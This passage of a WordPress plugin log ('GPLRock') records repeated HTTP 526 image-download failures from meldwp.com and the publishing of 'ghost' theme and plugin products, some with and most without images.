(attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:28 UTC] GPLRock: Image download failed for product apply-wordpress-admin-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/apply---wordpress-admin-theme-3022.webp for product apply-wordpress-admin-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:36:30 UTC] GPLRock WARNING: Image download failed for product apply-wordpress-admin-theme. URL: https://meldwp.com/wp-content/uploads/apply---wordpress-admin-theme-3022.webp [04-Apr-2026 23:36:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: apply-wordpress-admin-theme [04-Apr-2026 23:36:58 UTC] GPLRock: Image download failed for product foodtiger-food-delivery-multiple-restaurants (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:00 UTC] GPLRock: Image download failed for product foodtiger-food-delivery-multiple-restaurants (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodtiger---food-delivery---multiple-restaurants-12137.webp for product foodtiger-food-delivery-multiple-restaurants after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:03 UTC] GPLRock: Image download failed for product foodtiger-food-delivery-multiple-restaurants (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:05 UTC] GPLRock: Image download failed for product foodtiger-food-delivery-multiple-restaurants (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodtiger---food-delivery---multiple-restaurants-12137.webp for product foodtiger-food-delivery-multiple-restaurants after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:07 UTC] GPLRock WARNING: Image download failed for product foodtiger-food-delivery-multiple-restaurants. URL: https://meldwp.com/wp-content/uploads/foodtiger---food-delivery---multiple-restaurants-12137.webp [04-Apr-2026 23:37:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: foodtiger-food-delivery-multiple-restaurants [04-Apr-2026 23:37:07 UTC] GPLRock: Image download failed for product image-overlay-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:09 UTC] GPLRock: Image download failed for product image-overlay-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-overlay-addon-for-elementor-27586.webp for product image-overlay-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:11 UTC] GPLRock: Image download failed for product image-overlay-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:13 UTC] GPLRock: Image download failed for product image-overlay-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-overlay-addon-for-elementor-27586.webp for product image-overlay-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:15 UTC] GPLRock WARNING: Image download failed for product image-overlay-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/image-overlay-addon-for-elementor-27586.webp [04-Apr-2026 23:37:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: image-overlay-addon-for-elementor [04-Apr-2026 23:37:16 UTC] GPLRock: Image download failed for product packai-travel-packing-list-generator-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:18 UTC] GPLRock: Image download failed for product packai-travel-packing-list-generator-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/packai---travel-packing-list-generator-for-wordpress-6768.webp for product packai-travel-packing-list-generator-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:20 UTC] GPLRock: Image download failed for product packai-travel-packing-list-generator-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:22 UTC] GPLRock: Image download failed for product packai-travel-packing-list-generator-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/packai---travel-packing-list-generator-for-wordpress-6768.webp for product packai-travel-packing-list-generator-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:24 UTC] GPLRock WARNING: Image download failed for product packai-travel-packing-list-generator-for-wordpress. URL: https://meldwp.com/wp-content/uploads/packai---travel-packing-list-generator-for-wordpress-6768.webp [04-Apr-2026 23:37:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: packai-travel-packing-list-generator-for-wordpress [04-Apr-2026 23:37:24 UTC] GPLRock: Image download failed for product ionfullapp-full-ionic-template-cordova-plugins (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:26 UTC] GPLRock: Image download failed for product ionfullapp-full-ionic-template-cordova-plugins (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ionfullapp--full-ionic-template--cordova-plugins-30921.webp for product ionfullapp-full-ionic-template-cordova-plugins after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:29 UTC] GPLRock: Image download failed for product ionfullapp-full-ionic-template-cordova-plugins (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:31 UTC] GPLRock: Image download failed for product ionfullapp-full-ionic-template-cordova-plugins (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ionfullapp--full-ionic-template--cordova-plugins-30921.webp for product ionfullapp-full-ionic-template-cordova-plugins after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:33 UTC] GPLRock WARNING: Image download failed for product ionfullapp-full-ionic-template-cordova-plugins. URL: https://meldwp.com/wp-content/uploads/ionfullapp--full-ionic-template--cordova-plugins-30921.webp [04-Apr-2026 23:37:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ionfullapp-full-ionic-template-cordova-plugins [04-Apr-2026 23:37:33 UTC] GPLRock: Image download failed for product quickdate-android-mobile-social-dating-platform-application (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:35 UTC] GPLRock: Image download failed for product quickdate-android-mobile-social-dating-platform-application (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quickdate-android---mobile-social-dating-platform-application-31647.webp for product quickdate-android-mobile-social-dating-platform-application after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:37 UTC] GPLRock: Image download failed for product quickdate-android-mobile-social-dating-platform-application (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:39 UTC] GPLRock: Image download failed for product quickdate-android-mobile-social-dating-platform-application (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quickdate-android---mobile-social-dating-platform-application-31647.webp for product quickdate-android-mobile-social-dating-platform-application after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:41 UTC] GPLRock WARNING: Image download failed for product quickdate-android-mobile-social-dating-platform-application. URL: https://meldwp.com/wp-content/uploads/quickdate-android---mobile-social-dating-platform-application-31647.webp [04-Apr-2026 23:37:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quickdate-android-mobile-social-dating-platform-application [04-Apr-2026 23:37:42 UTC] GPLRock: Image download failed for product transition-slider-responsive-wordpress-slider-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:44 UTC] GPLRock: Image download failed for product transition-slider-responsive-wordpress-slider-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/transition-slider---responsive-wordpress-slider-plugin-18631.webp for product transition-slider-responsive-wordpress-slider-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:46 UTC] GPLRock: Image download failed for product transition-slider-responsive-wordpress-slider-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:48 UTC] GPLRock: Image download failed for product transition-slider-responsive-wordpress-slider-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/transition-slider---responsive-wordpress-slider-plugin-18631.webp for product transition-slider-responsive-wordpress-slider-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:50 UTC] GPLRock WARNING: Image download failed for product transition-slider-responsive-wordpress-slider-plugin. URL: https://meldwp.com/wp-content/uploads/transition-slider---responsive-wordpress-slider-plugin-18631.webp [04-Apr-2026 23:37:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: transition-slider-responsive-wordpress-slider-plugin [04-Apr-2026 23:37:50 UTC] GPLRock: Image download failed for product themes-pack-for-ninja-popups (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:52 UTC] GPLRock: Image download failed for product themes-pack-for-ninja-popups (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/themes-pack-for-ninja-popups-19289.webp for product themes-pack-for-ninja-popups after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:55 UTC] GPLRock: Image download failed for product themes-pack-for-ninja-popups (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:57 UTC] GPLRock: Image download failed for product themes-pack-for-ninja-popups (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:37:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/themes-pack-for-ninja-popups-19289.webp for product themes-pack-for-ninja-popups after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:37:59 UTC] GPLRock WARNING: Image download failed for product themes-pack-for-ninja-popups. URL: https://meldwp.com/wp-content/uploads/themes-pack-for-ninja-popups-19289.webp [04-Apr-2026 23:37:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: themes-pack-for-ninja-popups [04-Apr-2026 23:37:59 UTC] GPLRock: Image download failed for product new-zealand-post-shipping-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:38:01 UTC] GPLRock: Image download failed for product new-zealand-post-shipping-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:38:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/new-zealand-post-shipping-for-woocommerce-2448.webp for product new-zealand-post-shipping-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:38:03 UTC] GPLRock: Image download failed for product new-zealand-post-shipping-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:38:05 UTC] GPLRock: Image download failed for product new-zealand-post-shipping-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:38:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/new-zealand-post-shipping-for-woocommerce-2448.webp for product new-zealand-post-shipping-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:38:07 UTC] GPLRock WARNING: Image download failed for product new-zealand-post-shipping-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/new-zealand-post-shipping-for-woocommerce-2448.webp [04-Apr-2026 23:38:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: new-zealand-post-shipping-for-woocommerce [04-Apr-2026 23:38:08 UTC] GPLRock: Image download failed for product elementor-tabs-addon-widget (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:38:10 UTC] GPLRock: Image download failed for product elementor-tabs-addon-widget (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:38:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-tabs-addon-widget-27258.webp for product elementor-tabs-addon-widget after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:38:12 UTC] GPLRock: Image download failed for product elementor-tabs-addon-widget (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:38:14 UTC] GPLRock: Image download failed for product elementor-tabs-addon-widget (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:38:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-tabs-addon-widget-27258.webp for product elementor-tabs-addon-widget after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:38:16 UTC] GPLRock WARNING: Image download failed for product elementor-tabs-addon-widget. URL: https://meldwp.com/wp-content/uploads/elementor-tabs-addon-widget-27258.webp [04-Apr-2026 23:38:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elementor-tabs-addon-widget [04-Apr-2026 23:38:16 UTC] GPLRock: Image download failed for product woocommerce-customer-verification (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:38:18 UTC] GPLRock: Image download failed for product woocommerce-customer-verification (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:38:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-customer-verification-33569.webp for product woocommerce-customer-verification after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:38:21 UTC] GPLRock: Image download failed for product woocommerce-customer-verification (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:38:23 UTC] GPLRock: Image download failed for product woocommerce-customer-verification (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:38:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-customer-verification-33569.webp for product woocommerce-customer-verification after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:38:25 UTC] GPLRock WARNING: Image download failed for product woocommerce-customer-verification. URL: https://meldwp.com/wp-content/uploads/woocommerce-customer-verification-33569.webp [04-Apr-2026 23:38:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-customer-verification [04-Apr-2026 23:39:03 UTC] GPLRock: Image downloaded successfully for product kingho-hotel-booking-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8441c9c7.webp [04-Apr-2026 23:39:03 UTC] GPLRock: Using pre-downloaded image for product kingho-hotel-booking-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8441c9c7.webp [04-Apr-2026 23:39:03 UTC] GPLRock: Ghost product published with image - Product ID: kingho-hotel-booking-elementor-template-kit [04-Apr-2026 23:39:05 UTC] GPLRock: Image downloaded successfully for product kinco-day-care-kindergarten-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bc3a0ca2.webp [04-Apr-2026 23:39:05 UTC] GPLRock: Using pre-downloaded image for product kinco-day-care-kindergarten-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bc3a0ca2.webp [04-Apr-2026 23:39:05 UTC] GPLRock: Ghost product published with image - Product ID: kinco-day-care-kindergarten-elementor-template-kit [04-Apr-2026 23:39:06 UTC] GPLRock: Image downloaded successfully for product kimchi-asian-restaurant-cafe-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f3e5e477.webp [04-Apr-2026 23:39:06 UTC] GPLRock: Using pre-downloaded image for product kimchi-asian-restaurant-cafe-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f3e5e477.webp [04-Apr-2026 23:39:06 UTC] GPLRock: Ghost product published with image - Product ID: kimchi-asian-restaurant-cafe-elementor-template-kit [04-Apr-2026 23:39:08 UTC] GPLRock: Image downloaded successfully for product kidzy-elementary-school-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5f097dff.webp [04-Apr-2026 23:39:08 UTC] GPLRock: Using pre-downloaded image for product kidzy-elementary-school-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5f097dff.webp [04-Apr-2026 23:39:08 UTC] GPLRock: Ghost product published with image - Product ID: kidzy-elementary-school-elementor-template-kit [04-Apr-2026 23:39:09 UTC] GPLRock: Image downloaded successfully for product kidzie-baby-kids-e-commerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe30fafe.webp [04-Apr-2026 23:39:09 UTC] GPLRock: Using pre-downloaded image for product kidzie-baby-kids-e-commerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe30fafe.webp [04-Apr-2026 23:39:09 UTC] GPLRock: Ghost product published with image - Product ID: kidzie-baby-kids-e-commerce-elementor-template-kit [04-Apr-2026 23:39:11 UTC] GPLRock: Image downloaded successfully for product kidster-preschool-childcare-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0f18fdc1.webp [04-Apr-2026 23:39:11 UTC] GPLRock: Using pre-downloaded image for product kidster-preschool-childcare-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0f18fdc1.webp [04-Apr-2026 23:39:11 UTC] GPLRock: Ghost product published with image - Product ID: kidster-preschool-childcare-elementor-template-kit [04-Apr-2026 23:39:12 UTC] GPLRock: Image downloaded successfully for product kidiu-kindergarten-child-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-32c8cbe2.webp [04-Apr-2026 23:39:12 UTC] GPLRock: Using pre-downloaded image for product kidiu-kindergarten-child-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-32c8cbe2.webp [04-Apr-2026 23:39:12 UTC] GPLRock: Ghost product published with image - Product ID: kidiu-kindergarten-child-care-elementor-template-kit [04-Apr-2026 23:39:13 UTC] GPLRock: Image downloaded successfully for product kiba-bar-restaurant-elementor-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d3cd03c0.webp [04-Apr-2026 23:39:13 UTC] GPLRock: Using pre-downloaded image for product kiba-bar-restaurant-elementor-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d3cd03c0.webp [04-Apr-2026 23:39:13 UTC] GPLRock: Ghost product published with image - Product ID: kiba-bar-restaurant-elementor-kit [04-Apr-2026 23:39:15 UTC] GPLRock: Image downloaded successfully for product kiara-fashion-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-16bea0e7.webp [04-Apr-2026 23:39:15 UTC] GPLRock: Using pre-downloaded image for product kiara-fashion-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-16bea0e7.webp [04-Apr-2026 23:39:15 UTC] GPLRock: Ghost product published with image - Product ID: kiara-fashion-elementor-template-kit [04-Apr-2026 23:39:16 UTC] GPLRock: Image downloaded successfully for product khuli-construction-architecture-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5887acee.webp [04-Apr-2026 23:39:16 UTC] GPLRock: Using pre-downloaded image for product khuli-construction-architecture-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5887acee.webp [04-Apr-2026 23:39:16 UTC] GPLRock: Ghost product published with image - Product ID: khuli-construction-architecture-elementor-template-kit [04-Apr-2026 23:40:59 UTC] GPLRock: Image download failed for product guru-learning-management-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:01 UTC] GPLRock: Image download failed for product guru-learning-management-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/guru--learning-management-wordpress-28537.webp for product guru-learning-management-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:03 UTC] GPLRock: Image download failed for product guru-learning-management-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:05 UTC] GPLRock: Image download failed for product guru-learning-management-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/guru--learning-management-wordpress-28537.webp for product guru-learning-management-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:07 UTC] GPLRock WARNING: Image download failed for product guru-learning-management-wordpress. URL: https://meldwp.com/wp-content/uploads/guru--learning-management-wordpress-28537.webp [04-Apr-2026 23:41:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: guru-learning-management-wordpress [04-Apr-2026 23:41:08 UTC] GPLRock: Image download failed for product boxoffice-ticket-concert-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:10 UTC] GPLRock: Image download failed for product boxoffice-ticket-concert-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boxoffice---ticket-concert--event-wordpress-theme-10019.webp for product boxoffice-ticket-concert-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:12 UTC] GPLRock: Image download failed for product boxoffice-ticket-concert-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:14 UTC] GPLRock: Image download failed for product boxoffice-ticket-concert-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boxoffice---ticket-concert--event-wordpress-theme-10019.webp for product boxoffice-ticket-concert-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:16 UTC] GPLRock WARNING: Image download failed for product boxoffice-ticket-concert-event-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/boxoffice---ticket-concert--event-wordpress-theme-10019.webp [04-Apr-2026 23:41:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: boxoffice-ticket-concert-event-wordpress-theme [04-Apr-2026 23:41:16 UTC] GPLRock: Image download failed for product city2-multipurpose-directory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:18 UTC] GPLRock: Image download failed for product city2-multipurpose-directory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/city2---multipurpose-directory-wordpress-theme-32879.webp for product city2-multipurpose-directory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:21 UTC] GPLRock: Image download failed for product city2-multipurpose-directory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:23 UTC] GPLRock: Image download failed for product city2-multipurpose-directory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/city2---multipurpose-directory-wordpress-theme-32879.webp for product city2-multipurpose-directory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:25 UTC] GPLRock WARNING: Image download failed for product city2-multipurpose-directory-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/city2---multipurpose-directory-wordpress-theme-32879.webp [04-Apr-2026 23:41:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: city2-multipurpose-directory-wordpress-theme [04-Apr-2026 23:41:25 UTC] GPLRock: Image download failed for product sasstech-saas-software-it-solution-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:27 UTC] GPLRock: Image download failed for product sasstech-saas-software-it-solution-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sasstech--saas-software--it-solution-multipurpose-wordpress-theme-20807.webp for product sasstech-saas-software-it-solution-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:29 UTC] GPLRock: Image download failed for product sasstech-saas-software-it-solution-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:31 UTC] GPLRock: Image download failed for product sasstech-saas-software-it-solution-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sasstech--saas-software--it-solution-multipurpose-wordpress-theme-20807.webp for product sasstech-saas-software-it-solution-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:34 UTC] GPLRock WARNING: Image download failed for product sasstech-saas-software-it-solution-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sasstech--saas-software--it-solution-multipurpose-wordpress-theme-20807.webp [04-Apr-2026 23:41:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sasstech-saas-software-it-solution-multipurpose-wordpress-theme [04-Apr-2026 23:41:34 UTC] GPLRock: Image download failed for product optik-optometrist-eye-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:36 UTC] GPLRock: Image download failed for product optik-optometrist-eye-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/optik---optometrist--eye-care-wordpress-theme-4016.webp for product optik-optometrist-eye-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:38 UTC] GPLRock: Image download failed for product optik-optometrist-eye-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:40 UTC] GPLRock: Image download failed for product optik-optometrist-eye-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/optik---optometrist--eye-care-wordpress-theme-4016.webp for product optik-optometrist-eye-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:42 UTC] GPLRock WARNING: Image download failed for product optik-optometrist-eye-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/optik---optometrist--eye-care-wordpress-theme-4016.webp [04-Apr-2026 23:41:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: optik-optometrist-eye-care-wordpress-theme [04-Apr-2026 23:41:42 UTC] GPLRock: Image download failed for product coaching-life-and-business-coach-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:44 UTC] GPLRock: Image download failed for product coaching-life-and-business-coach-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coaching---life-and-business-coach-wordpress-theme-25628.webp for product coaching-life-and-business-coach-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:47 UTC] GPLRock: Image download failed for product coaching-life-and-business-coach-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:49 UTC] GPLRock: Image download failed for product coaching-life-and-business-coach-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coaching---life-and-business-coach-wordpress-theme-25628.webp for product coaching-life-and-business-coach-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:51 UTC] GPLRock WARNING: Image download failed for product coaching-life-and-business-coach-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/coaching---life-and-business-coach-wordpress-theme-25628.webp [04-Apr-2026 23:41:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: coaching-life-and-business-coach-wordpress-theme [04-Apr-2026 23:41:51 UTC] GPLRock: Image download failed for product unicka-hair-styling-beauty-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 